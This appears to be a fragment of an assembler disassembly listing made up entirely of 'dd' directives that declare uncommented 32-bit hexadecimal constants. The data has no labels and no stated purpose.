dd 93F104A4h, 2894CFC2h, 87177683h, 4ECA5640h, 0B4305F82h
dd 7323422Eh, 5F8C587Bh, 2F64E32h, 11246D32h, 0FC1FEA64h
dd 0C3AAC991h, 0F7007C0h, 2E276732h, 2600794Fh, 81453890h
dd 1A44CBFAh, 0A023E40Fh, 8AF395F3h, 5721B8AAh, 792C4B9Ah
dd 0E0946028h, 59F8E0FFh, 4FBDFC19h, 0D0FA904Ch, 7ED0D757h
dd 0E821D8Eh, 8030882Ah, 0B34F0404h, 0CD002014h, 0F2E2745h
dd 5532CCECh, 1113B57Ch, 91D40EF2h, 1F444BFEh, 98DA2388h
dd 90E7A6h, 0E6A235Ah, 0F78E7640h, 35AB6594h, 9C9D7CC2h
dd 859A02EBh, 0C9911054h, 0E8368C0Dh, 0EDC05C48h, 0B463D05Dh
dd 40881231h, 858F4768h, 81D60A9Fh, 1A386CB6h, 5EA2C743h
dd 61927E36h, 0A7044257h, 372B9169h, 0AA55452Ch, 0F4129332h
dd 2AA25C1Fh, 0A29D83h, 5EFBC00Dh, 0A290DA69h, 0CA5D2A8Eh
dd 0FC0C22A0h, 0D3B24DB0h, 0B7F9EA0Eh, 25748AC9h, 0E0A416E7h
dd 356A8328h, 19463959h, 0AC517234h, 0EA8DD761h, 0D0ACC12Eh
dd 4D14285Ch, 8AE2AA36h, 0B2C540D7h, 19F1ECE2h, 512D0636h
dd 0D4602F79h, 12560A5Eh, 15E86345h, 0CE14D6C5h, 8AEC32A4h
dd 9DBF48EAh, 0A24E7D13h, 0C89046F7h, 9A1851B9h, 2A2BF446h
dd 479577AFh, 81A8AD4Eh, 3F8E71C4h, 0B6FF8246h, 2E7DC728h
dd 2AB14534h, 7972A06Ah, 8B94CD05h, 17265954h, 0A9AF0FCh
dd 82ADC5A7h, 0C2CCD3A4h, 0FD3F57BEh, 0D6F673BFh, 0D59D7165h
dd 0A3333D70h, 0A82E629Ch, 0D7BC3FB0h, 0EAD050D0h, 0B1C993B2h
dd 120A254Dh, 7D7BDC8Ch, 7C37FA1h, 0EC3FAC2Bh, 2F458A1Eh
dd 6FA64097h, 0A2CCFEE9h, 9D94E2E3h, 0D2E1C48Ah, 0C3306ADDh
dd 844171F5h, 43D277B3h, 1036C14h, 3AA1E5F0h, 0CC64F316h
dd 83EF2C38h, 4A260381h, 4092D5F6h, 0B093EE0Ah, 0D5307E0Eh
dd 0D6546670h, 0B4805AE1h, 96C14C1Bh, 0F74F96A1h, 0EB52CE3Fh
dd 140429B8h, 0FDE7B01Ch, 14370FD7h, 818C02E9h, 45248C50h
dd 904E5F14h, 52AE74D6h, 2FE37DD6h, 2D936820h, 521D690Ah
dd 0CAB396A8h, 5D6FF55h, 9EBF2384h, 539FFA20h, 0C1203BCDh
dd 0E47C0AD4h, 0CC6599FFh, 6D52E7D2h, 0A1A19055h, 0E14A0AFAh
dd 0B545C9A3h, 0B0A92411h, 91F113C2h, 82425AF7h, 0CEB5A77h
dd 11FEFCB4h, 52C09146h, 2B8EBF4Ah, 44A50144h, 8BE7270Bh
dd 7F31F64Dh, 0C2CEB84Fh, 1EC9B7C9h, 11445373h, 3FE81D73h
dd 660C3002h, 0CF327DD6h, 0F5CB1EC5h, 189C430Bh, 1AF51C3Ch
dd 4319C662h, 0C9BA82EEh, 542B0940h, 2E0BC2C2h, 0F81A642Bh
dd 0BD2CC479h, 4A0E1048h, 3C2FE22Ch, 8D5E2812h, 0A63A3401h
dd 42D43145h, 60EB9480h, 79695100h, 0A2D74C75h, 7D08685h
dd 0CB38D91Ah, 0E13328B3h, 0DCFE687Bh, 3548B5A8h, 46C1FBEh
dd 0F5A1BC5Fh, 46EB3569h, 0C42D37B7h, 0E46F1BBCh, 6EF63F9Bh
dd 9FA47426h, 0A2738EBh, 0B9E72F13h, 4BAF4C88h, 45CD01E1h
dd 664EC0C7h, 21906813h, 0C6DE6A8Ah, 7C72E088h, 8EAE4102h
dd 37C2353Bh, 7829314Ah, 1DB26071h, 71301601h, 0A822B012h
dd 68F88C69h, 455DC69h, 31685A68h, 5B0072AFh, 94AF2C28h
dd 0E18E431Ah, 340EC0AFh, 5F464C5Fh, 63722A16h, 0C6982D48h
dd 3BF2060Fh, 96CAADA6h, 6E6350ABh, 88831B45h, 920700E3h
dd 7D83FA5Ah, 0AB555B98h, 9DF109A8h, 0E24CDC1h, 1C05E4E3h
dd 16EB4C8Fh, 42E92310h, 7B204BDCh, 9C320D74h, 0D36C7CF9h
dd 0EB6270AEh, 0C15178D2h, 50170C21h, 0C2C728FBh, 0AD70781Ch
dd 0F55FDED4h, 8636CC1Fh, 38ABBF29h, 540CA856h, 6A7FB0F8h
dd 7B1A2405h, 0F87CBA5h, 45037ADAh, 7881B0D1h, 3A9D6AE1h
dd 8CF5B818h, 7569BA45h, 77AC467h, 2D7FC2F0h, 2C51037Ch
dd 1E83A60Ah, 10A6A1E3h, 855AC76Dh, 1D5C8BAEh, 86325D9Ah
dd 0CD7A8C3Bh, 0F5F1FA38h, 94608452h, 3B9D9A26h, 75956736h
dd 0B2CEB7C1h, 0F97460E7h, 88E2F3h, 118090DAh, 0ADED3509h
dd 850985A3h, 0F54B441Fh, 66045A8h, 6C9FF15h, 4CC85084h
dd 9CDAB696h, 4899AA9Ah, 0F3AA2197h, 0C5B5507h, 958A4F90h
dd 10C63440h, 0AB236269h, 159F9CD4h, 0A4394E93h, 3BDC0EBFh
dd 3D577018h, 46530BCh, 0BA552140h, 55022B97h, 497B3B30h
dd 7E971734h, 94D00A7Eh, 29A8F3ADh, 0F4801B96h, 0E425C13Ah
dd 5F24AB18h, 0CD9CCD08h, 28170BD1h, 0FE35F16Ah, 0F1AA486Ah
dd 0A880B9EBh, 1558A669h, 3F91A8AEh, 0C20AD0AFh, 0C1F84615h
dd 98739D08h, 26A03FD8h, 0F08A270h, 52BF59EFh, 1A04159Bh
dd 4975DB00h, 0DA4C8AE7h, 0B2776ED4h, 4318D5ECh, 2175F0BAh
dd 0F1AA32A0h, 7BD586ABh, 0DCCE1284h, 56694AD9h, 631080B3h
dd 0E56E7FBCh, 149F1ABBh, 2612906h, 88C46369h, 499D0E19h
dd 390BAFF1h, 0AF50FEDFh, 0EAAF476h, 0D8A763A2h, 4D1DB790h
dd 0E0B5F3D7h, 0F2B90900h, 0FC99B472h, 0C0537019h, 0FDC1BA46h
dd 0E67EFCA7h, 0B0387D4Ch, 0F53A7DA0h, 0D8522655h, 0E91427D4h
dd 0AA64087Eh, 5A47B540h, 0E12BAA22h, 3AD5E123h, 7671B8CAh
dd 98820494h, 0B3A054D2h, 5F5A7EB8h, 0F727F157h, 9BC89066h
dd 0DDEB37D5h, 178B4A84h, 57EB843Ah, 47DAB22Ah, 0C3246EDAh
dd 958582EFh, 0FD2619FFh, 85E295CFh, 88110978h, 0AA5AE238h
dd 0DBE2A80Ah, 0A8FA50C2h, 0D0BACF85h, 6E198270h, 0AE323090h
dd 1EB8728Ah, 28BB453Eh, 0F5D49AF4h, 0E7973E1Fh, 2E24A24Ch
dd 0AE5F073Eh, 0E3292AFDh, 8AE5FCEAh, 49F6F6A3h, 4C1D4C26h
dd 2EB26E93h, 0E518FC5Dh
dd 0AE5BE588h, 0FFE9C837h, 0BEF38A81h, 94308050h, 0C4D46C1Ah
dd 7389D9BAh, 9473B063h, 0F64E52ECh, 9A2FF613h, 0F2BA17FCh
dd 23FCFD3Ah, 812360B4h, 17228978h, 36A6DF47h, 0A98BE441h
dd 0C0B1633Ah, 86013AB7h, 6B08F1BDh, 6D374FFFh, 4740019Ch
dd 0F72A38DFh, 0BF1FA5F5h, 9D688DA3h, 938DBF8h, 0B043BF80h
dd 0F7F28019h, 139678AAh, 6B9119E8h, 17DBAA6h, 92C964D3h
dd 597BD42Fh, 303CA444h, 0C3E34DEh, 0A45FE829h, 7BCFE765h
dd 3AE82173h, 0A7417565h, 0C84AEAD9h, 217D83A2h, 688C1140h
dd 0EE55CAEAh, 4511C403h, 0DCF4B419h, 2EABABC7h, 0C8AC7051h
dd 0E601B26Ch, 47BBCA7Fh, 91A00912h, 44E6C670h, 5D2621C5h
dd 80197C93h, 5988F939h, 0C183D843h, 779BAAF9h, 8E62DF07h
dd 6E0F452Ch, 2073E8E2h, 4B24E33Ch, 0C5DE8AE1h, 0C86913CAh
dd 1E822A7h, 0BC1D6013h, 8566C17Fh, 0AEC9266h, 0B09C0802h
dd 55DECA6Fh, 0ED021847h, 33B59020h, 3190412Bh, 0EC36DE45h
dd 4C29FC3Dh, 8A7FF2h, 0C2D94BB5h, 81B8AE05h, 0B7A38851h
dd 8A730A34h, 1228D3BBh, 0A4FEB21h, 30142AFCh, 0AD966277h
dd 8B599616h, 2240A447h, 29AE4ADDh, 0E874993Ah, 30C4B483h
dd 24931B2Fh, 0A6475E18h, 43029ABEh, 1A088D17h, 0A9A38372h
dd 4E235A8Fh, 3F40568h, 20773286h, 4DDBB159h, 0FE2B4C41h
dd 0D3A6177Fh, 60DA0C4h, 0CCB637E3h, 0D4ABF375h, 2E42F42Eh
dd 958D0E28h, 160787A3h, 576A242h, 460F1Ch, 0D4DB943Ch
dd 0BD182151h, 8FE3C086h, 1BA5D7FDh, 460149A3h, 69C226E9h
dd 7C5A4B41h, 0D46616C5h, 66A60B5Dh, 0C5892F30h, 0B2EBED44h
dd 825E09DDh, 8B5310A1h, 6A7C0C2h, 35135DA9h, 9ABD1EB1h
dd 40E71AA2h, 0AC5FA8D7h, 334936Bh, 0A185006Eh, 5C92F11h
dd 4CC1F929h, 8D65149Eh, 20C6BE64h, 452E43FDh, 0E69922D6h
dd 7FA4830h, 0BD0FB481h, 0D50F0A95h, 0E10FB225h, 610E7225h
dd 0E4633225h, 9114F24Dh, 455615F6h, 0EEBDCF38h, 3154F76Fh
dd 0CA847C77h, 4DE85F3Ah, 0BCC76717h, 5FAC636Eh, 43531C11h
dd 0CF01064h, 809F8493h, 0C7DCEBA9h, 813D81E4h, 7959750h
dd 64506032h, 94C73435h, 22B6BA56h, 0A012907h, 8420E534h
dd 4F824010h, 0C487A091h, 880A20AFh, 35CD1E8Bh, 2E7D522Bh
dd 36BBEB78h, 3963AC86h, 7145ECDCh, 0A3810CE7h, 0E7341330h
dd 8254C757h, 779BF041h, 0F7A26674h, 0D4EA37DCh, 6317EB73h
dd 0B011143Ch, 6E53FF5Dh, 2C78A0E8h, 0BAC320Dh, 86E5150Ah
dd 7EBE15F7h, 3B852F60h, 5D1FE1F5h, 369030D1h, 0CC1F4699h
dd 51393414h, 96C0C1C2h, 0DE449D5h, 4B5E0C18h, 73820533h
dd 9A066A92h, 0BB2BD8CBh, 5906A9Ah, 0C533E086h, 0CA0D495Ah
dd 752EC1C2h, 7EDEAA84h, 5D469278h, 71488FFCh, 0A052965Dh
dd 785F5771h, 0BA458285h, 6089D2A6h, 0E2828553h, 100AEB86h
dd 41566310h, 558BAE59h, 13D93A23h, 65EA2507h, 5F44DF19h
dd 2902E92Eh, 86EA6B9Ch, 0CCC7EDBFh, 4733AAAEh, 747F70FCh
dd 0F3862BE1h, 23D00D38h, 0EF15C1D0h, 4AC8C91Ah, 0D85C761Fh
dd 28F629A8h, 6B2910C3h, 0AE04D744h, 7358AC67h, 0BB5104D6h
dd 3745ED02h, 0DC5AC6ADh, 8B074A12h, 78383E02h, 0E3B1985Eh
dd 50E1FD86h, 74A444B5h, 0DA4E0303h, 818BA880h, 0E8CD87AEh
dd 6D8B9BADh, 0D5819B42h, 9A11A5FDh, 285A857Dh, 3F971787h
dd 840730Ch, 0B968E414h, 0A5F471B8h, 0E852DB20h, 910F25B4h
dd 2FF84EF6h, 3AB7E44Ah, 0AF049A18h, 4048204Eh, 0D75813C8h
dd 0F567E932h, 533A7603h, 5CFA2D47h, 97E80DEFh, 0C6067204h
dd 0D1F21B86h, 75CCFA51h, 1ABB3B2Dh, 606DE0EFh, 68220154h
dd 426B57A5h, 0A6EDAA80h, 0CC622E90h, 0FC939BF4h, 0CFECFB0Eh
dd 420105BCh, 6545A1FAh, 308B8300h, 7B18F006h, 185FCAh
dd 0EC0685A1h, 50C0F035h, 826AB980h, 0FA6754C0h, 0BE9B667Eh
dd 0ED132D8Bh, 0E435C0C6h, 4E428F3Ah, 543A748Dh, 31A4B09Ch
dd 12C0AA61h, 0ED54478Ah, 27985F7Ch, 9E44656h, 75857D34h
dd 0DA58EE5Bh, 0E772A862h, 168A0B97h, 7421A6DCh, 0DA7FAD3h
dd 0B239252Fh, 6CF2AE42h, 8EDB70C1h, 51FD1FD5h, 0A29B09E3h
dd 0D9A93D15h, 9151398Ah, 7BF8B493h, 9C9F3ADh, 0C108241h
dd 18B74B14h, 0B1694A8Fh, 89022260h, 2248C943h, 0C4145BC7h
dd 42247048h, 0F63DB036h, 4540A4C1h, 0B1B220BAh, 0FBF65280h
dd 704541A1h, 0C988FC3Dh, 0A817A1ECh, 6059802Ah, 6CC05D20h
dd 4F4027Dh, 0D6BF1F01h, 8B326277h, 77DFC52Fh, 0E911D738h
dd 6B5CB183h, 8D1D2DDAh, 37D8DB2Dh, 0D42EC54Dh, 0BC53BFC5h
dd 0A9303B6Eh, 7F2A1484h, 0FAEFA445h, 14A1C35Fh, 0C785440Bh
dd 0B0405317h, 11C6F0EEh, 0D89E5CE2h, 0F4D5ED5Ch, 2FF0F73Fh
dd 766A7E7Ah, 8CCD606Ah, 62AE28BDh, 0D4A74942h, 53F3B7FCh
dd 54CC0660h, 3ED03950h, 50380B81h, 0A9DE7E12h, 370AC443h
dd 0BE35BE66h, 89E11D52h, 9566187Bh, 74A6F4F3h, 0DD8B23B9h
dd 0FCC2AA3h, 4533E760h, 3380C50h, 940FB86Ch, 9366D013h
dd 31A25CCAh, 75D70498h, 53F053BEh, 3D71E92Bh, 1248E8FEh
dd 1452F72Dh, 85318B2Ch, 477D7013h, 86E10828h, 5D45205h
dd 6B412FBBh, 25B98F3Fh, 9667C319h, 46179A8h, 5BEB5E7Dh
dd 1828454Ah, 841B896Ah, 85A4959Bh, 0C444811Bh, 7812F3D9h
dd 800CC5D7h, 95FFB29Dh, 0BBB73CA4h, 0AB4C8846h, 74485E83h
dd 617C9535h, 0A5564CECh, 48A5FDAEh, 893C3601h, 0ADC83790h
dd 76A0A18h, 0DC10D404h, 0E2F0E8h, 0D0662A26h, 7B17C5A8h
dd 6C17F07Dh, 0FC7B4A8Bh, 0F066E7D8h, 0D4150D36h, 0C2FBDA0Bh
dd 0E283D924h, 2C4D0705h, 0AEB12146h, 245DE2A5h, 3858F9C8h
dd 4902343h, 66616489h, 8E0FCF89h, 6A9B5D85h, 2245AE26h
dd 8334CC57h, 0CAE406EAh, 8AB4D3CAh, 0B0C8857Ch, 6D621346h
dd 82704813h, 26BAA51h, 565B5DF6h, 62A0281Ch, 2CB88DCh
dd 4ABA784Eh, 6CE3079Dh, 0E82C9B8Ch, 0BC8BA98Ah, 0E3EBB767h
dd 2EE7A848h, 0DABA3760h, 14C67ECBh, 4BAD39D4h, 78ABA24h
dd 5C9EBAB6h, 2616BE3Dh, 8CC1BF8h, 214BB850h, 97512DE0h
dd 51304B34h, 0DC502EE2h, 19F26185h, 8827F14h, 9C12681Eh
dd 1F191082h, 0EC6C7D18h, 1F824CA2h, 0CE07AFE2h, 66ED208h
dd 1CF4F244h, 583B51FCh, 0B8398AF5h, 94F39160h, 4AF5E787h
dd 10041409h, 26127D4Fh, 0DFD82BADh, 0BC138646h, 32AB4DA2h
dd 422E67Ch, 0E7A5B2CCh, 32B9E45Fh, 0C864FFC9h, 7DD04BC0h
dd 0FD24317Ch, 9CA73D60h, 2390E171h, 5D458167h, 1CC60C98h
dd 808DD00h, 9B80E902h, 8C6508h, 647D51F2h, 1B11200Dh
dd 0E7F01C54h, 0A00C075Dh, 80A1B51Ch, 85C74085h, 5069697Ah
dd 988B1A06h, 0C58C05EBh, 10FA372Ch, 40A21305h, 16C82102h
dd 0D812699h, 57183120h, 4322245Ah, 1D207ACh, 704A298Bh
dd 812A8023h, 4A9D095h, 0E898C255h, 24AE0962h, 10FAEF26h
dd 0A783CA8h, 0B020092Ch, 0E0040084h, 0FA24954Bh, 0C2452552h
dd 2457552Fh, 573352FEh, 3F811B04h, 36D86230h, 0EA9A3FC3h
dd 0DC25B32Dh, 0F32CC011h, 0AC83CC49h, 6287F9Eh, 0C2535123h
dd 2825DFD8h, 1462FDC1h, 0DD26A00Ch, 0FB8EC4C6h, 0A4883FC5h
dd 0DA245217h, 0DC8792BFh, 661737FAh, 0BF65F078h, 0C179A44Fh
dd 525346ABh, 4B926F0Ch, 1C95BF30h, 934BA87Ah, 5B64A928h
dd 6368CA30h, 490D2880h
dd 43F00113h, 793DC40Dh, 21697014h, 1364CA1Fh, 0D3886559h
dd 959DCB7Ch, 5A2C492h, 0BD4831BDh, 31579067h, 0A39B66C4h
dd 0D3A66418h, 0B8810A52h, 259D3A80h, 0E680A051h, 791A8AB2h
dd 8FCB8Eh, 0E25012F6h, 8600D12Fh, 293A405Dh, 51C48C51h
dd 0C614A36h, 45128A81h, 412222A9h, 122A2A94h, 22A9A943h
dd 2AA49421h, 12614112h, 0A400E78Ah, 2B615019h, 1E6B8D61h
dd 0A5235527h, 352281ADh, 45141E04h, 0FCDB3C61h, 2277BCD9h
dd 55EE956Ch, 7C3DCBABh, 0FBBB83F1h, 8AB21437h, 4F62ABB8h
dd 0B98AAF9Bh, 84EFF8DEh, 8262BE8Ah, 7B27E775h, 0A0542327h
dd 0EB8756B9h, 0D3EE2A34h, 0E82B7481h, 0C577BF30h, 0E03F1005h
dd 0AAD70C9Eh, 920DB594h, 0ABB328FEh, 0BAC96AD5h, 5E832D59h
dd 47DDE730h, 0FC1BE827h, 86F450CCh, 0DAB8431Bh, 90354EBFh
dd 7EA4B30Ah, 0BAF503Ch, 0C2A0317Fh, 7C282557h, 94340D5h
dd 3FE45046h, 92173FC8h, 0A9C17869h, 0D8CFABC8h, 1D1C459Fh
dd 68D20466h, 8AC468C6h, 0C96B5AAAh, 54DF42E8h, 46959A94h
dd 37452691h, 288F7A21h, 54DC050Ah, 0A3BEDF94h, 0B309A33Fh
dd 0AE3F8566h, 0AECFCAF1h, 70CEA414h, 0ABADE0B2h, 5AD15D3Ah
dd 0A29E74E4h, 106064EAh, 4E1BE8E2h, 0C985FA0Ah, 0E2B522DAh
dd 0E63E6411h, 0AB8400BDh, 9D7F27Ch, 7B1A70Ch, 483052D1h
dd 85E7DF31h, 9D8592C0h, 0E5EF8D04h, 0F7FBA422h, 0C43DAF2Eh
dd 921C3ECAh, 39FF7F82h, 10CEEA3h, 0EBCBE8B1h, 0AAC0B97Ah
dd 57C618B2h, 580D6739h, 0A2B05655h, 17F45963h, 7C6B141Ah
dd 0F58A4327h, 0AAC7A769h, 0BEE4EAF2h, 1C574B31h, 2DFDE66Ah
dd 101E4EDEh, 0EE931E12h, 24515839h, 112EDABBh, 0AB86AB40h
dd 0B830C908h, 2AC542Dh, 68F6148Fh, 0B0B7269Bh, 49287480h
dd 55FE40B0h, 8A540065h, 0AED22EAAh, 561F9688h, 100E8009h
dd 36FF66FBh, 0B3BE38BEh, 0E70F9803h, 4FBD3D66h, 34955003h
dd 0DD94CBE2h, 91BB8556h, 335B8F2Eh, 784E4015h, 0D4D03EA7h
dd 0A2D304EEh, 9CA2D2Fh, 0EB0B4E23h, 519B2DA8h, 5ED24DC2h
dd 4CC5048Ch, 1545B5E2h, 89A40087h, 575A8868h, 830BAF5Ch
dd 2EA83AEAh, 6F592C56h, 3A6C3480h, 83B655F8h, 4E6FF22Dh
dd 50DC9882h, 1453A56Eh, 0CD385820h, 568F953Dh, 5B8F7AFDh
dd 75F6E358h, 8474836Ch, 8964B368h, 0B016C104h, 0C6925157h
dd 0A312D75Ch, 0A7622084h, 0EADAD0ACh, 0EA308EA9h, 0FACC51Fh
dd 0AF753F5Dh, 550B0AB2h, 0BA44E115h, 0A79FB5Bh, 260F0458h
dd 3CF80109h, 672B509Ah, 0A6D2E761h, 44B5AA21h, 12690E03h
dd 64912896h, 910B1289h, 0AB74B108h, 0E58AF224h, 0AFD497FBh
dd 81E9B466h, 6F2905D4h, 4B44268Dh, 1D434ECAh, 0AAA0520Dh
dd 75858B16h, 2D2A78B3h, 23BBE95Dh, 655EBE0Eh, 3DA87911h
dd 5F44817h, 0CEAF7229h, 0E0FF8BAFh, 94C78BFCh, 31E1504Bh
dd 5E4AEFD9h, 0BB0B81A9h, 0EB24FA2Ah, 383EB62Fh, 0EE16B472h
dd 104B0843h, 0F100003Bh, 0E7059583h, 7562C7A7h, 628391E0h
dd 0EBF6CB0Ah, 8116D452h, 2BE655D8h, 0D00BA88Bh, 0FB23838Bh
dd 0A79ED32h, 274A914Ch, 0C4F0228Ah, 8C023008h, 15B2299Ah
dd 20AA5380h, 0A4E2008Eh, 82F4F403h, 0F4E29C8Ah, 8D08BD01h
dd 1A4CE88Ah, 0E322CBD0h, 1DFCF308h, 0C00450B0h, 0FFF70F0Fh
dd 13B07D1Dh, 2E41C5A3h, 0FBE9741h, 0DF0655E8h, 65BDB604h
dd 233DB16h, 85575258h, 0DA6984A9h, 3618A01Dh, 0C0717B4Dh
dd 9814245Ah, 0C87135B6h, 0D10F60B6h, 0A82700C7h, 1526FF7Ch
dd 0D36197A0h, 49CF9D64h, 58D8247h, 0D275E917h, 0C65C7A01h
dd 3B6C2847h, 0A257AC80h, 8963011Bh, 25A7C4B0h, 0AF12CAh
dd 67002ABDh, 23CA12h, 0D8550679h, 5F15D84Bh, 0C22D7A01h
dd 1771128Ah, 3BF90E47h, 0F43202A7h, 0CDD4924Bh, 55F407B2h
dd 8CE67005h, 963B3348h, 528A1175h, 463AFC38h, 804A2FE3h
dd 68A8FCC4h, 0CED6BBB6h, 62CA1AB6h, 0A2DEF6FBh, 0FA487AF8h
dd 0D332F794h, 0CAEE38AFh, 0F0ECEE6Ah, 12F29B4h, 0C440A75h
dd 84092E85h, 0BC8698CDh, 1F4424A6h, 0EDDCA3BCh, 82AC0A7Fh
dd 19A81D8Ch, 0B4144508h, 6C383F9h, 405E114h, 211B7D25h
dd 0F0606083h, 4D082BD1h, 0AE91CAC0h, 95D8154h, 3E3C8C54h
dd 5835CAC0h, 0C102E148h, 59B17B80h, 305C44D2h, 0C89C60CAh
dd 0A131E4B8h, 0E21E54B7h, 651B02F5h, 0FFE673B4h, 0BBA082E1h
dd 0D734A03Ch, 8C2E5743h, 38BB980Bh, 0E428A524h, 55098A84h
dd 0AB5A7427h, 0EBAC005Ch, 0F34FA295h, 77C61D76h, 0C5955C1Ah
dd 55A9BE9Ch, 0D5CAD183h, 968E4196h, 112E4394h, 4CAB4050h
dd 0B405B1E0h, 61956266h, 0A8D26706h, 33E920B6h, 8BD6E3A9h
dd 0AD86E45h, 561C7F42h, 0CF609863h, 0A765134Dh, 5ABF7F2Eh
dd 89B07CF5h, 0C5FED5E0h, 78FD2557h, 2833B07Eh, 8942AFFFh
dd 601CC275h, 0C4B4D044h, 0B45F83BBh, 5892173h, 0ED08CD7Ah
dd 4E529887h, 0D7303D0Eh, 0E0C1E757h, 0D5C0A1D9h, 0C83EF013h
dd 4DDA952h, 2EFC844Fh, 1CD80D9h, 0AC36BF8Ah, 0BB0106CBh
dd 0C42545E7h, 355DD9BBh, 82F56706h, 6480BF4Ah, 3230D601h
dd 6451E2EEh, 861F5F8Eh, 8431559Bh, 0A5A8C051h, 31791BCCh
dd 254CB062h, 34086865h, 0AF6D6739h, 0FE25F5D6h, 22B00F92h
dd 7C8B8F86h, 67CCEFh, 87AEA9CAh, 0CCE4E10Fh, 0FAC502FAh
dd 961282E9h, 0B72241A7h, 0B772F392h, 0D595B2C2h, 5A11B1F5h
dd 0CE3D5F15h, 1593714h, 0ACAE1619h, 8BADF2F5h, 8582537Fh
dd 7C837B1Ah, 5334C25h, 68C28102h, 0E1BEE4D0h, 0E413713Ah
dd 0B3C59F26h, 0EFEA774Bh, 489BF57h, 0A1F077CBh, 26895A4Fh
dd 4C53EA13h, 0A20B7608h, 0DDC4D677h, 22AB82E2h, 0DD2808D5h
dd 4E5C2AB5h, 292E040h, 72D76700h, 5BB012D7h, 5ABCA2FCh
dd 7AC136CEh, 864487E1h, 0F2F96D4Dh, 7AFC06F0h, 0C020F9Bh
dd 15DE26ABh, 8C443FB5h, 0F09C80B6h, 95401B04h, 2195F822h
dd 6ED37D81h, 7DB74955h, 0D650C1FEh, 29007F0h, 82702C03h
dd 0CDD6BE12h, 3206658Ch, 7726E820h, 32BA62BDh, 14328BABh
dd 0A4C13B4Ch, 9859D06Bh, 7E3128A9h, 34A16F39h, 0B1C96577h
dd 0DF540422h, 41D14484h, 3AC00229h, 9FFDF437h, 6494D97Fh
dd 0EF35FABEh, 283E53A1h, 45240569h, 44707F18h, 0AFC68C67h
dd 26082318h, 0A0ED7AEh, 382BF107h, 43E649D8h, 9AF01C41h
dd 1F0B6AB3h, 4A357820h, 2D06A5DDh, 0C9291C0Ch, 0ABB9BAAEh
dd 6C8E1EEFh, 0A310AB5Dh, 0D3F4C025h, 0EC740A2Bh, 508276C6h
dd 182090C0h, 0ED198951h, 0DA10BE4Eh, 423D061Dh, 27918D02h
dd 0E8D068CEh, 0E8936420h, 58D2122Ch, 820B88F1h, 0AEBCC1BAh
dd 55568080h, 74BC8963h, 0EA370E15h, 17BC1D60h, 0E3A42B07h
dd 73F05D4h, 43870A30h, 5B54F059h, 33E0E2ABh, 42985E9h
dd 48405EB1h, 1121801h, 0D8A90647h, 68BC20AAh, 6A9D6A31h
dd 17F12FE3h, 6A74B266h, 0D657B875h, 0F04E5FC1h, 487E73ACh
dd 0D013DE05h, 6E093782h, 0C62E9DA8h, 5BE9B09Ch, 0A175950Ch
dd 68DFA636h, 885A0E3h, 40ED595h, 8EB2DE24h, 593603B7h
dd 0FCD3EA63h, 0E5952E4Fh, 601060BAh, 0F01C396Eh, 9500F161h
dd 0A1465742h, 87E05FC5h, 83E6F58Fh, 0A70BAD8Bh, 90D0815Ah
dd 0C121F96Bh, 3E3AAC4h, 197FC197h, 741C0DEDh, 0F2A92950h
dd 0BAC45E97h, 0CFF407Fh, 1BF1C632h, 0B8C08BACh, 7369C3FEh
dd 2790CC16h, 0A77F6678h
dd 49F766DDh, 0A430BBA4h, 823E490h, 1CC10314h, 1FF5E029h
dd 0B736D3E2h, 0E5606015h, 2B95DC59h, 57453C50h, 24758091h
dd 28A9E2A9h, 2AB5655Ah, 4495FE46h, 8A552A85h, 1DF4A211h
dd 3FC3E005h, 0AABC0FC7h, 2B565A4h, 0A6492593h, 0BDC18556h
dd 0B32E9C64h, 119ABC46h, 12493B1h, 0CAED1AFDh, 9C2A10DFh
dd 0B3152EC6h, 93B652B9h, 0B191085Ah, 3FB60EF6h, 0A1C275E6h
dd 8A182D8Bh, 0C1A91F47h, 0EC2CE60Ch, 28AF2BF5h, 461598F8h
dd 5D4229C0h, 51DEC1E9h, 1458A82h, 0BCF5A7B7h, 38727499h
dd 44AA2AEDh, 461717C3h, 29109CB4h, 0A2EF7A36h, 5D0900C8h
dd 0B130D5F9h, 0B5FC36C7h, 4C042DC2h, 0FEE3F4F9h, 0C8C2594Fh
dd 29671C00h, 46F21286h, 0B5FCDF9Fh, 15BA2A78h, 50D07316h
dd 0B6BF4FE3h, 0EA27A746h, 0C150B5D5h, 8E07F127h, 4081651Ah
dd 0EEB1BE48h, 0F3CEA799h, 0D4184259h, 0BF4DB46Bh, 0D716AA2Ah
dd 820A55F5h, 5F46E5D7h, 19FD9545h, 110BE666h, 0E5CA4120h
dd 0C4AEAEECh, 56E6AD80h, 0AA5297B5h, 0DD4E5977h, 86161EAAh
dd 7F342B0Bh, 4EA9D265h, 0B3CC12EBh, 115DD5F1h, 0DDB92CB0h
dd 6415DB44h, 332B815Dh, 3AC33773h, 8CAA3898h, 0A2CA2636h
dd 6AC0D361h, 327490h, 6C930C46h, 2E0908BFh, 0F01EF557h
dd 6069F13Ah, 14451482h, 7381D0C8h, 3EB75561h, 18375BA0h
dd 8BA4FC02h, 5218FD23h, 10119DA7h, 953334Fh, 513C95DFh
dd 82A10366h, 0DC49F73Bh, 0C36188C0h, 0BCB58030h, 19871590h
dd 5966552Dh, 0EF0C56ACh, 0D3EE03F8h, 4E4A2BBh, 0AD55AA5h
dd 7C9D15E1h, 0F845CA5Bh, 46B8F1E1h, 66B0C7BBh, 0C6E20962h
dd 0B37A8019h, 6A0008A9h, 0A110E53Ch, 0E158F02Fh, 94240387h
dd 424A9BC1h, 31568440h, 0E087109h, 81E0FD25h, 4E9D015Bh
dd 0E6FBA22Bh, 8FEA3B34h, 7405CE12h, 5D3A28Ah, 61D25BE4h
dd 0AF798C6Dh, 827149Dh, 2558BFEh, 0A37AE2F9h, 0A8D5290h
dd 0F14EA4Dh, 336A07CFh, 1C1DC6Ch, 0D0ED02Dh, 0D08C15Ah
dd 797FE372h, 56D264h, 0A174E353h, 784D4851h, 0EE5D88E0h
dd 0E67A02C5h, 0CD376A34h, 8B021D57h, 0F330AE0Dh, 0F5B5B7F6h
dd 0A10ABFFBh, 55915685h, 0A81BBC75h, 52CA2A38h, 0B0B5B812h
dd 0AD11C22Eh, 6BA48008h, 780AFF1Dh, 15EFF1F4h, 0D7F67197h
dd 0E68B347Eh, 1CAD9440h, 8313C24Ch, 30E72441h, 784310A5h
dd 59DE5A29h, 0ED391CE9h, 0A517B415h, 0C1954CA0h, 0A337C143h
dd 0CFC655BCh, 2153CC9Ah, 832F2FE6h, 0B5745107h, 0E0102950h
dd 0B971E98Dh, 38529EBh, 581F84A3h, 0E856EDAFh, 485D6AC1h
dd 6C832F87h, 4715A70h, 0E434EAA5h, 357125D1h, 0D5DA1814h
